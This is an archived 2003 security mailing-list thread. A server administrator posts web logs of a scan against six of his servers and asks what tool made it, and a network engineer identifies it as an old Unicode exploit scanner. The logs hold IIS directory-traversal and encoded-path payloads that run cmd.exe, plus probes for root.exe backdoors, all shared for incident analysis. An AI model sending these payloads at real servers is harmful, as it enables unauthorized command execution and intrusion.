RE: Anyone know this tool?
From: James Williams (jwilliams_at_mail.wtamu.edu)
Date: 07/29/03
- Previous message: Jason Rumney: "Re: Anyone know this tool?"
- In reply to: Danny: "Anyone know this tool?"
- Next in thread: Danny: "Re: Anyone know this tool?"
- Reply: Danny: "Re: Anyone know this tool?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: "'Danny'" <danny@eboundary.com> Date: Tue, 29 Jul 2003 11:42:06 -0500
Looks like old Unicode exploits. Those scanners are all over the place.
You could probably go to packetstormsecurity.nl and search for "Unicode"
and find one.
James Williams
Network Systems Engineer
West Texas A&M University
http://www.wtamu.edu
Phone: 806-651-2162
Email: jwilliams@mail.wtamu.edu
-----Original Message-----
From: Danny [mailto:danny@eboundary.com]
Sent: Monday, July 28, 2003 10:24 PM
To: incidents@securityfocus.com
Subject: Anyone know this tool?
Does anyone happen to know what tool this is? I've seen the exact same
scans on 6 of our servers on completely different networks. All the
scans have been from different source IP's and all the servers were hit
within a space of a few hours.
Curiosity is getting the better of me since i've never seen this exact
pattern before :)
64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../
winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
"-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
"-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
"-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
"-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-"
"-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
"-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:43 -0500] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
Danny
Work - http://www.eBoundary.com - Secure, FreeBSD hosting.
Play - http://www.eBoundary.net - Who really sets your electronic
boundaries?
AIM: eBoundaryTch | ICQ: 3090141
------------------------------------------------------------------------
--- ------------------------------------------------------------------------ ---- --------------------------------------------------------------------------- ----------------------------------------------------------------------------
- Previous message: Jason Rumney: "Re: Anyone know this tool?"
- In reply to: Danny: "Anyone know this tool?"
- Next in thread: Danny: "Re: Anyone know this tool?"
- Reply: Danny: "Re: Anyone know this tool?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
